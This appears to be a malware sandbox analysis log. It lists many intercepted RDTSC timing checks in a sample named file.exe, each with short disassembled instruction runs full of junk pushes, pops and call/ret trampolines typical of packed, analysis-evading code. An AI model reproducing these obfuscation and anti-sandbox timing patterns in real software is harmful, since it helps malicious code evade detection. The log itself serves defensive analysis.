Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D04D24 second address: D04D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jl 00007FC330B7B0F6h 0x0000000b jmp 00007FC330B7B106h 0x00000010 pop ecx 0x00000011 jmp 00007FC330B7B101h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FC330B7B0FDh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D04D6A second address: D04D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D04D70 second address: D04D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D04D74 second address: D04D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0512D second address: D0513E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC330B7B0FCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D052B5 second address: D052CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D052CA second address: D052D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06B34 second address: D06B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06B38 second address: D06B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06F78 second address: D06F9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0701F second address: D07026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07026 second address: D0706F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC3313C0916h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 ja 00007FC3313C091Ch 0x00000016 pop ebx 0x00000017 xchg eax, ebx 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FC3313C0918h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push eax 0x00000037 pop eax 0x00000038 pop eax 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0706F second address: D07075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07075 second address: D07079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D071FA second address: D07217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B108h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A0D6 second address: D0A0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0AB3F second address: D0AB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jo 00007FC330B7B104h 0x0000000c pushad 0x0000000d jne 00007FC330B7B0F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A0DA second address: D0A0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B765 second address: D0B7DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC330B7B0F8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007FC330B7B101h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d jg 00007FC330B7B0F6h 0x00000033 xchg eax, ebx 0x00000034 jmp 00007FC330B7B106h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B7DA second address: D0B7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B7DE second address: D0B7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0CCD4 second address: D0CCDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0CCDA second address: D0CD21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B100h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, AB40h 0x00000012 mov dword ptr [ebp+12456338h], ebx 0x00000018 push 00000000h 0x0000001a jmp 00007FC330B7B0FBh 0x0000001f push 00000000h 0x00000021 mov esi, ebx 0x00000023 xchg eax, ebx 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC330B7B0FFh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0CD21 second address: D0CD54 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3313C0916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC3313C0926h 0x00000014 jmp 00007FC3313C091Dh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1546B second address: D1546F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1546F second address: D15473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14591 second address: D14595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15473 second address: D154EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 jmp 00007FC3313C0920h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC3313C0918h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1944h], esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007FC3313C0918h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b or bh, FFFFFFB8h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007FC3313C0922h 0x00000057 push edx 0x00000058 pop edx 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14595 second address: D1462A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, 45B9F9F8h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FC330B7B0F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 xor edi, dword ptr [ebp+122D1BDAh] 0x00000036 mov dword ptr [ebp+1245DFC5h], eax 0x0000003c mov ebx, dword ptr [ebp+122D28E1h] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 jmp 00007FC330B7B0FEh 0x0000004e jmp 00007FC330B7B0FAh 0x00000053 mov eax, dword ptr [ebp+122D01C5h] 0x00000059 jg 00007FC330B7B0F9h 0x0000005f push FFFFFFFFh 0x00000061 pushad 0x00000062 mov edi, 767E8CA3h 0x00000067 mov edi, dword ptr [ebp+122D1F8Ah] 0x0000006d popad 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push edi 0x00000072 jg 00007FC330B7B0F6h 0x00000078 pop edi 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D154EE second address: D15501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C091Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15501 second address: D15505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17605 second address: D17634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FC3313C091Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC3313C0928h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D167EA second address: D167EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D167EF second address: D167FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D194B1 second address: D194C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC330B7B101h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D194C6 second address: D194CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D194CA second address: D19541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FC330B7B0F8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D373Fh] 0x00000029 push 00000000h 0x0000002b add edi, dword ptr [ebp+122D36ABh] 0x00000031 cld 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FC330B7B0F8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e xchg eax, esi 0x0000004f jo 00007FC330B7B102h 0x00000055 jp 00007FC330B7B0FCh 0x0000005b jbe 00007FC330B7B0F6h 0x00000061 push eax 0x00000062 jo 00007FC330B7B108h 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D19541 second address: D19545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D19545 second address: D19549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A5EB second address: D1A5F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A5F1 second address: D1A62F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC330B7B100h 0x00000008 jmp 00007FC330B7B100h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007FC330B7B0FCh 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FC330B7B0F6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A62F second address: D1A633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B50E second address: D1B512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D5AD second address: D1D5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A7BC second address: D1A7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1979D second address: D197A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B6FF second address: D1B71A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC330B7B0F8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C779 second address: D1C795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0928h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D5B3 second address: D1D5C6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC330B7B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B71A second address: D1B7DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC3313C0921h 0x00000008 jmp 00007FC3313C091Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 movzx edi, ax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FC3313C0918h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D18FEh], ecx 0x0000003a adc edi, 1BEE989Ch 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 js 00007FC3313C091Eh 0x0000004d jno 00007FC3313C0918h 0x00000053 mov eax, dword ptr [ebp+122D04B9h] 0x00000059 jmp 00007FC3313C0920h 0x0000005e push FFFFFFFFh 0x00000060 push 00000000h 0x00000062 push eax 0x00000063 call 00007FC3313C0918h 0x00000068 pop eax 0x00000069 mov dword ptr [esp+04h], eax 0x0000006d add dword ptr [esp+04h], 00000018h 0x00000075 inc eax 0x00000076 push eax 0x00000077 ret 0x00000078 pop eax 0x00000079 ret 0x0000007a mov dword ptr [ebp+122D2E3Dh], esi 0x00000080 jmp 00007FC3313C0929h 0x00000085 push eax 0x00000086 push esi 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D5C6 second address: D1D63F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC330B7B0F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FC330B7B0F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 sub edi, 704AE961h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FC330B7B0F8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 sub dword ptr [ebp+122D2D30h], edx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007FC330B7B108h 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B7DA second address: D1B7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E69F second address: D1E714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC330B7B0F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007FC330B7B104h 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D2D45h], ecx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FC330B7B0F8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 or dword ptr [ebp+122D21C3h], esi 0x0000003c push 00000000h 0x0000003e call 00007FC330B7B101h 0x00000043 movsx ebx, si 0x00000046 pop edi 0x00000047 add ebx, dword ptr [ebp+122D2E64h] 0x0000004d push eax 0x0000004e push ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E714 second address: D1E718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F72B second address: D1F731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20941 second address: D20947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20947 second address: D2094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2094B second address: D2094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F884 second address: D1F898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F898 second address: D1F8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F8A0 second address: D1F8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20A56 second address: D20A5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20A5C second address: D20A61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2804D second address: D28058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28058 second address: D2805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2805C second address: D28060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28060 second address: D28075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FC330B7B0F6h 0x0000000d ja 00007FC330B7B0F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E31D second address: D2E323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F7E5 second address: D2F7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F7E9 second address: D2F803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F803 second address: D2F809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F809 second address: D2F80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F93E second address: B54ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FC330B7B0F6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 add dword ptr [esp], 6C5BB100h 0x00000017 pushad 0x00000018 adc al, FFFFFFC2h 0x0000001b mov edi, ecx 0x0000001d popad 0x0000001e jmp 00007FC330B7B0FDh 0x00000023 push dword ptr [ebp+122D1359h] 0x00000029 jc 00007FC330B7B0FCh 0x0000002f call dword ptr [ebp+122D194Dh] 0x00000035 pushad 0x00000036 sub dword ptr [ebp+122D28F6h], eax 0x0000003c sub dword ptr [ebp+122D1903h], eax 0x00000042 xor eax, eax 0x00000044 mov dword ptr [ebp+122D28C7h], ecx 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e mov dword ptr [ebp+122D1903h], esi 0x00000054 mov dword ptr [ebp+122D36F7h], eax 0x0000005a jmp 00007FC330B7B0FFh 0x0000005f mov esi, 0000003Ch 0x00000064 jnl 00007FC330B7B109h 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e xor dword ptr [ebp+122D28C7h], ebx 0x00000074 lodsw 0x00000076 cmc 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b jmp 00007FC330B7B109h 0x00000080 jnc 00007FC330B7B10Eh 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a add dword ptr [ebp+122D18F9h], eax 0x00000090 nop 0x00000091 push eax 0x00000092 push edx 0x00000093 pushad 0x00000094 push eax 0x00000095 pop eax 0x00000096 jmp 00007FC330B7B108h 0x0000009b popad 0x0000009c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34A75 second address: D34A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FC3313C0918h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 je 00007FC3313C0916h 0x00000018 jns 00007FC3313C0916h 0x0000001e jno 00007FC3313C0916h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34A9E second address: D34AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34AA2 second address: D34AB6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007FC3313C0916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC3313C0916h 0x00000014 rdtsc
